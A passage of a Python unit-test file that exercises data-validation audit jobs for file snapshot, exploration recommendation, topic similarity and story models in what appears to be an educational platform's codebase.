            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of FileSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'FileSnapshotMetadataModel\', 1]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """A last_updated in the future (via mocked datetime) fails the
        current time check.
        """
        self.model_instance_1.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'FileSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_file_model_failure(self):
        """Deleting the parent FileModel fails the file_ids field check
        for both of its snapshots.
        """
        file_models.FileModel.get_by_id(self.id_0).delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for file_ids '
                'field check of FileSnapshotMetadataModel\', '
                '[u"Entity id %s-1: based on field file_ids '
                'having value %s, expect model FileModel with '
                'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
                'field file_ids having value %s, expect model '
                'FileModel with id %s but it doesn\'t exist"]]'
            ) % (
                self.id_0, self.id_0, self.id_0, self.id_0,
                self.id_0, self.id_0),
            u'[u\'fully-validated FileSnapshotMetadataModel\', 1]']
        run_job_and_check_output(
            self, expected_output, literal_eval=True)

    def test_missing_committer_model_failure(self):
        """Deleting the committer's UserSettingsModel fails the
        committer_ids field check.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of FileSnapshotMetadataModel\', '
                '[u"Entity id %s-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.id_1, self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'FileSnapshotMetadataModel\', 1]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_file_version_in_model_id(self):
        """A snapshot id whose version exceeds the parent model's version
        fails the file model version check.
        """
        model_with_invalid_version_in_id = (
            file_models.FileSnapshotMetadataModel(
                id='%s-3' % self.id_0, committer_id=self.owner_id,
                commit_type='edit', commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for file model '
                'version check of FileSnapshotMetadataModel\', '
                '[u\'Entity id %s-3: File model corresponding to '
                'id %s has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ) % (self.id_0, self.id_0), (
                u'[u\'fully-validated FileSnapshotMetadataModel\', '
                '2]')]
        run_job_and_check_output(self, expected_output, sort=True)
class FileSnapshotContentModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    FileSnapshotContentModel.
    """

    def setUp(self):
        """Creates two file models and fetches their v1 snapshot
        content models.
        """
        super(FileSnapshotContentModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            'exp%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(2)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        file_model_0 = file_models.FileModel.create(
            'exploration/exp0', 'assets/image/img0.png')
        file_model_0.commit(self.owner_id, [])
        file_model_1 = file_models.FileModel.create(
            'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
        file_model_1.commit(self.owner_id, [])
        self.id_0 = file_model_0.id
        self.id_1 = file_model_1.id
        self.model_instance_0 = (
            file_models.FileSnapshotContentModel.get_by_id(
                '%s-1' % self.id_0))
        self.model_instance_1 = (
            file_models.FileSnapshotContentModel.get_by_id(
                '%s-1' % self.id_1))
        self.job_class = (
            prod_validation_jobs_one_off.FileSnapshotContentModelAuditOneOffJob)

    def test_standard_operation(self):
        """Valid models are reported as fully-validated."""
        expected_output = [
            u'[u\'fully-validated FileSnapshotContentModel\', 2]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time field
        relation check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of FileSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'FileSnapshotContentModel\', 1]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """A last_updated in the future (via mocked datetime) fails the
        current time check.
        """
        self.model_instance_1.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'FileSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_file_model_failure(self):
        """Deleting the parent FileModel fails the file_ids field check
        for both of its snapshots.
        """
        file_models.FileModel.get_by_id(
            self.id_0).delete(self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for file_ids '
                'field check of FileSnapshotContentModel\', '
                '[u"Entity id %s-1: based on field file_ids '
                'having value %s, expect model FileModel with '
                'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
                'field file_ids having value %s, expect model '
                'FileModel with id %s but it doesn\'t exist"]]'
            ) % (
                self.id_0, self.id_0, self.id_0, self.id_0, self.id_0,
                self.id_0),
            u'[u\'fully-validated FileSnapshotContentModel\', 1]']
        run_job_and_check_output(self, expected_output, literal_eval=True)

    def test_invalid_file_version_in_model_id(self):
        """A snapshot id whose version exceeds the parent model's version
        fails the file model version check.
        """
        model_with_invalid_version_in_id = (
            file_models.FileSnapshotContentModel(
                id='%s-3' % self.id_0))
        model_with_invalid_version_in_id.content = 'content'
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for file model '
                'version check of FileSnapshotContentModel\', '
                '[u\'Entity id %s-3: File model corresponding to '
                'id %s has a version 1 which is less than '
                'the version 3 in snapshot content model id\']]'
            ) % (self.id_0, self.id_0), (
                u'[u\'fully-validated FileSnapshotContentModel\', '
                '2]')]
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRecommendationsModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the ExplorationRecommendationsModel audit one-off job."""

    def setUp(self):
        """Creates six explorations, sets recommendations for two of them
        and stores the resulting model instances plus the audit job class.
        """
        super(ExplorationRecommendationsModelValidatorTests, self).setUp()
        self.signup(USER_EMAIL, USER_NAME)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.user_id, exp)
        recommendations_services.set_recommendations('0', ['3', '4'])
        recommendations_services.set_recommendations('1', ['5'])
        self.model_instance_0 = (
            recommendations_models.ExplorationRecommendationsModel.get_by_id(
                '0'))
        self.model_instance_1 = (
            recommendations_models.ExplorationRecommendationsModel.get_by_id(
                '1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .ExplorationRecommendationsModelAuditOneOffJob)

    def test_standard_model(self):
        """Checks that untouched recommendation models validate fully."""
        expected_output = [(
            u'[u\'fully-validated ExplorationRecommendationsModel\', 2]')]
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks the time-field relation check for created_on fields set
        after last_updated.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of ExplorationRecommendationsModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance_0.id, self.model_instance_0.created_on,
                    self.model_instance_0.last_updated),
            u'[u\'fully-validated ExplorationRecommendationsModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a last_updated value in the (mocked) future is
        reported by the current-time check.
        """
        self.model_instance_1.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationRecommendationsModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)

    def test_model_with_missing_recommended_exploration(self):
        """Checks the exploration_ids external-reference check when a
        recommended exploration has been deleted.
        """
        exp_models.ExplorationModel.get_by_id('3').delete(
            self.user_id, '', [{}])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids field '
                'check of ExplorationRecommendationsModel\', '
                '[u"Entity id 0: based on field exploration_ids having value '
                '3, expect model ExplorationModel with '
                'id 3 but it doesn\'t exist"]]'
            ),
            u'[u\'fully-validated ExplorationRecommendationsModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_id_in_recommended_ids(self):
        """Checks that an exploration recommending itself is reported."""
        self.model_instance_0.recommended_exploration_ids = ['0', '4']
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for item exploration id check '
                'of ExplorationRecommendationsModel\', '
                '[u\'Entity id 0: The exploration id: 0 for which the '
                'entity is created is also present in the recommended '
                'exploration ids for entity\']]'
            ),
            u'[u\'fully-validated ExplorationRecommendationsModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
class TopicSimilaritiesModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the TopicSimilaritiesModel audit one-off job."""

    def setUp(self):
        """Stores a symmetric 3x3 topic-similarity matrix in the singleton
        TopicSimilaritiesModel and records the audit job class.
        """
        super(TopicSimilaritiesModelValidatorTests, self).setUp()
        self.model_instance = recommendations_models.TopicSimilaritiesModel(
            id=recommendations_models.TOPIC_SIMILARITIES_ID)
        self.content = {
            'Art': {'Art': '1.0', 'Biology': '0.8', 'Chemistry': '0.1'},
            'Biology': {'Art': '0.8', 'Biology': '1.0', 'Chemistry': '0.5'},
            'Chemistry': {'Art': '0.1', 'Biology': '0.5', 'Chemistry': '1.0'},
        }
        self.model_instance.content = self.content
        self.model_instance.put()
        self.job_class = (
            prod_validation_jobs_one_off.TopicSimilaritiesModelAuditOneOffJob)

    def test_standard_model(self):
        """Checks that a well-formed similarity matrix validates fully."""
        expected_output = [(
            u'[u\'fully-validated TopicSimilaritiesModel\', 1]')]
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks the time-field relation check for created_on fields set
        after last_updated.
        """
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of TopicSimilaritiesModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance.id, self.model_instance.created_on,
                    self.model_instance.last_updated)]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a last_updated value in the (mocked) future is
        reported by the current-time check.
        """
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'TopicSimilaritiesModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_id(self):
        """Checks that a model whose id is not the singleton id fails the
        model id regex check.
        """
        model_with_invalid_id = recommendations_models.TopicSimilaritiesModel(
            id='invalid', content=self.content)
        model_with_invalid_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for model id check of '
                'TopicSimilaritiesModel\', '
                '[u\'Entity id invalid: Entity id does not match regex '
                'pattern\']]'
            ),
            u'[u\'fully-validated TopicSimilaritiesModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_topic_similarities_columns(self):
        """Checks that a matrix with a wrong column count is reported."""
        content = {
            'Art': {'Art': '1.0', 'Biology': '0.5'},
            'Biology': {}
        }
        self.model_instance.content = content
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for topic similarity check '
            'of TopicSimilaritiesModel\', '
            '[u"Entity id topics: Topic similarity validation for '
            'content: {u\'Biology\': {}, u\'Art\': {u\'Biology\': u\'0.5\', '
            'u\'Art\': u\'1.0\'}} fails with error: Length of topic '
            'similarities columns: 1 does not match length of '
            'topic list: 2."]]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_topic(self):
        """Checks that an unknown topic name in the matrix is reported."""
        content = {
            'Art': {'Art': '1.0', 'invalid': '0.5'},
            'invalid': {'Art': '0.5', 'invalid': '1.0'}
        }
        self.model_instance.content = content
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for topic similarity check '
            'of TopicSimilaritiesModel\', '
            '[u"Entity id topics: Topic similarity validation for '
            'content: {u\'Art\': {u\'Art\': u\'1.0\', u\'invalid\': u\'0.5\'}, '
            'u\'invalid\': {u\'Art\': u\'0.5\', u\'invalid\': u\'1.0\'}} '
            'fails with error: Topic invalid not in list of known topics."]]')]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_topic_similarities_rows(self):
        """Checks that a matrix with a wrong row count is reported."""
        content = {
            'Art': {'Art': '1.0', 'Biology': '0.5'}
        }
        self.model_instance.content = content
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for topic similarity check '
            'of TopicSimilaritiesModel\', [u"Entity id topics: '
            'Topic similarity validation for content: {u\'Art\': '
            '{u\'Biology\': u\'0.5\', u\'Art\': u\'1.0\'}} fails with '
            'error: Length of topic similarities rows: 2 does not match '
            'length of topic list: 1."]]')]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_similarity_type(self):
        """Checks that a non-float similarity value is reported."""
        content = {
            'Art': {'Art': 'one', 'Biology': 0.5},
            'Biology': {'Art': 0.5, 'Biology': 1.0}
        }
        self.model_instance.content = content
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for topic similarity '
            'check of TopicSimilaritiesModel\', '
            '[u"Entity id topics: Topic similarity validation for '
            'content: {u\'Biology\': {u\'Biology\': 1.0, u\'Art\': 0.5}, '
            'u\'Art\': {u\'Biology\': 0.5, u\'Art\': u\'one\'}} '
            'fails with error: Expected similarity to be a float, '
            'received one"]]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_similarity_value(self):
        """Checks that a similarity outside [0.0, 1.0] is reported."""
        content = {
            'Art': {'Art': 10.0, 'Biology': 0.5},
            'Biology': {'Art': 0.5, 'Biology': 1.0}
        }
        self.model_instance.content = content
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for topic similarity check '
            'of TopicSimilaritiesModel\', '
            '[u"Entity id topics: Topic similarity validation for '
            'content: {u\'Biology\': {u\'Biology\': 1.0, u\'Art\': 0.5}, '
            'u\'Art\': {u\'Biology\': 0.5, u\'Art\': 10.0}} '
            'fails with error: Expected similarity to be between '
            '0.0 and 1.0, received 10.0"]]')]
        run_job_and_check_output(self, expected_output)

    # Fixed typo in the method name: "assymetric" -> "asymmetric". Test
    # discovery still finds it via the "test_" prefix, so no caller breaks.
    def test_model_with_asymmetric_content(self):
        """Checks that a non-symmetric similarity matrix is reported."""
        content = {
            'Art': {'Art': 1.0, 'Biology': 0.5},
            'Biology': {'Art': 0.6, 'Biology': 1.0}
        }
        self.model_instance.content = content
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for topic similarity '
            'check of TopicSimilaritiesModel\', '
            '[u"Entity id topics: Topic similarity validation for '
            'content: {u\'Biology\': {u\'Biology\': 1.0, u\'Art\': 0.6}, '
            'u\'Art\': {u\'Biology\': 0.5, u\'Art\': 1.0}} fails with error: '
            'Expected topic similarities to be symmetric."]]')]
        run_job_and_check_output(self, expected_output)
class StoryModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the StoryModel audit one-off job."""

    def setUp(self):
        """Creates six explorations, a topic and three two-node stories
        (each node linked to one exploration), then stores the story model
        instances and the audit job class.
        """
        super(StoryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        language_codes = ['ar', 'en', 'en']
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            # Fixed: interpolate the index like the sibling test classes do;
            # the literal 'title %d' was never formatted. No assertion in
            # this class depends on the story title.
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for index, story in enumerate(stories):
            story.language_code = language_codes[index]
            story.add_node('node_1', 'Node1')
            story.add_node('node_2', 'Node2')
            story.update_node_destination_node_ids('node_1', ['node_2'])
            story.update_node_exploration_id(
                'node_1', explorations[index * 2].id)
            story.update_node_exploration_id(
                'node_2', explorations[index * 2 + 1].id)
            topic.add_canonical_story(story.id)
            story_services.save_new_story(self.owner_id, story)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = story_models.StoryModel.get_by_id('0')
        self.model_instance_1 = story_models.StoryModel.get_by_id('1')
        self.model_instance_2 = story_models.StoryModel.get_by_id('2')
        self.job_class = (
            prod_validation_jobs_one_off.StoryModelAuditOneOffJob)

    def test_standard_operation(self):
        """Checks that stories with an extra valid commit validate fully."""
        story_services.update_story(
            self.owner_id, '0', [story_domain.StoryChange({
                'cmd': 'update_story_property',
                'property_name': 'title',
                'new_value': 'New title',
                'old_value': 'title 0'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated StoryModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks the time-field relation check for created_on fields set
        after last_updated.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(
            feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of StoryModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance_0.id,
                    self.model_instance_0.created_on,
                    self.model_instance_0.last_updated
                ),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a last_updated value in the (mocked) future is
        reported by the current-time check.
        """
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StoryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_story_schema(self):
        """Checks that a story failing domain validation (here: a language
        code outside the allowed list) is reported.
        """
        expected_output = [
            (
                u'[u\'failed validation check for domain object check of '
                'StoryModel\', '
                '[u\'Entity id %s: Entity fails domain validation with the '
                'error Invalid language code: %s\']]'
            ) % (self.model_instance_0.id, self.model_instance_0.language_code),
            u'[u\'fully-validated StoryModel\', 2]']
        with self.swap(
            constants, 'ALL_LANGUAGE_CODES', [{
                'code': 'en', 'description': 'English'}]):
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_model_failure(self):
        """Checks the exploration_ids external-reference check when a
        linked exploration has been deleted.
        """
        exp_models.ExplorationModel.get_by_id('1').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids field '
                'check of StoryModel\', '
                '[u"Entity id 0: based on field exploration_ids having value '
                '1, expect model ExplorationModel with id 1 but it '
                'doesn\'t exist"]]'),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_commit_log_entry_model_failure(self):
        """Checks the story_commit_log_entry_ids external-reference check
        when a commit log entry has been deleted.
        """
        story_services.update_story(
            self.owner_id, '0', [story_domain.StoryChange({
                'cmd': 'update_story_property',
                'property_name': 'title',
                'new_value': 'New title',
                'old_value': 'title 0'
            })], 'Changes.')
        story_models.StoryCommitLogEntryModel.get_by_id(
            'story-0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for '
                'story_commit_log_entry_ids field check of '
                'StoryModel\', '
                '[u"Entity id 0: based on field '
                'story_commit_log_entry_ids having value '
                'story-0-1, expect model StoryCommitLogEntryModel '
                'with id story-0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_summary_model_failure(self):
        """Checks the story_summary_ids external-reference check when the
        summary model has been deleted.
        """
        story_models.StorySummaryModel.get_by_id('0').delete()
        expected_output = [
            (
                u'[u\'failed validation check for story_summary_ids '
                'field check of StoryModel\', '
                '[u"Entity id 0: based on field story_summary_ids having '
                'value 0, expect model StorySummaryModel with id 0 '
                'but it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_rights_model_failure(self):
        """Checks the story_rights_ids external-reference check when the
        rights model has been deleted.
        """
        story_models.StoryRightsModel.get_by_id(
            '0').delete(feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_rights_ids '
                'field check of StoryModel\', '
                '[u"Entity id 0: based on field story_rights_ids having '
                'value 0, expect model StoryRightsModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_metadata_model_failure(self):
        """Checks the snapshot_metadata_ids external-reference check when
        the snapshot metadata model has been deleted.
        """
        story_models.StorySnapshotMetadataModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of StoryModel\', '
                '[u"Entity id 0: based on field snapshot_metadata_ids having '
                'value 0-1, expect model StorySnapshotMetadataModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_content_model_failure(self):
        """Checks the snapshot_content_ids external-reference check when
        the snapshot content model has been deleted.
        """
        story_models.StorySnapshotContentModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of StoryModel\', '
                '[u"Entity id 0: based on field snapshot_content_ids having '
                'value 0-1, expect model StorySnapshotContentModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class StorySnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the StorySnapshotMetadataModel audit one-off job."""

    def setUp(self):
        """Creates three stories (story '0' committed by a separate user)
        and stores the version-1 snapshot metadata models plus the audit
        job class.
        """
        super(StorySnapshotMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for story in stories:
            if story.id != '0':
                story_services.save_new_story(self.owner_id, story)
            else:
                story_services.save_new_story(self.user_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = (
            story_models.StorySnapshotMetadataModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            story_models.StorySnapshotMetadataModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            story_models.StorySnapshotMetadataModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .StorySnapshotMetadataModelAuditOneOffJob)

    def test_standard_operation(self):
        """Checks that snapshot metadata for a valid extra commit
        validates fully.
        """
        story_services.update_story(
            self.owner_id, '0', [story_domain.StoryChange({
                'cmd': 'update_story_property',
                'property_name': 'title',
                'new_value': 'New title',
                'old_value': 'title 0'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated StorySnapshotMetadataModel\', 4]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks the time-field relation check for created_on fields set
        after last_updated.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StorySnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'StorySnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a last_updated value in the (mocked) future is
        reported by the current-time check.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StorySnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_model_failure(self):
        """Checks the story_ids external-reference check when the parent
        story model has been deleted.
        """
        story_models.StoryModel.get_by_id('0').delete(
            self.user_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_ids '
                'field check of StorySnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field story_ids '
                'having value 0, expect model StoryModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'story_ids having value 0, expect model '
                'StoryModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'StorySnapshotMetadataModel\', 2]')]
        run_job_and_check_output(
            self, expected_output, literal_eval=True)

    def test_missing_committer_model_failure(self):
        """Checks the committer_ids external-reference check when the
        committer's user settings model has been deleted.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of StorySnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'StorySnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_story_version_in_model_id(self):
        """Checks that a snapshot metadata model whose id encodes a
        version greater than the story model's version is reported.
        """
        model_with_invalid_version_in_id = (
            story_models.StorySnapshotMetadataModel(
                id='0-3', committer_id=self.owner_id, commit_type='edit',
                commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for story model '
                'version check of StorySnapshotMetadataModel\', '
                '[u\'Entity id 0-3: Story model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ), (
                u'[u\'fully-validated StorySnapshotMetadataModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)

    # Fixed typo in the method name: "schmea" -> "schema". Test discovery
    # still finds it via the "test_" prefix, so no caller breaks.
    def test_model_with_invalid_commit_cmd_schema(self):
        """Checks that commit commands with missing or extra attributes
        fail the per-command domain validation checks.
        """
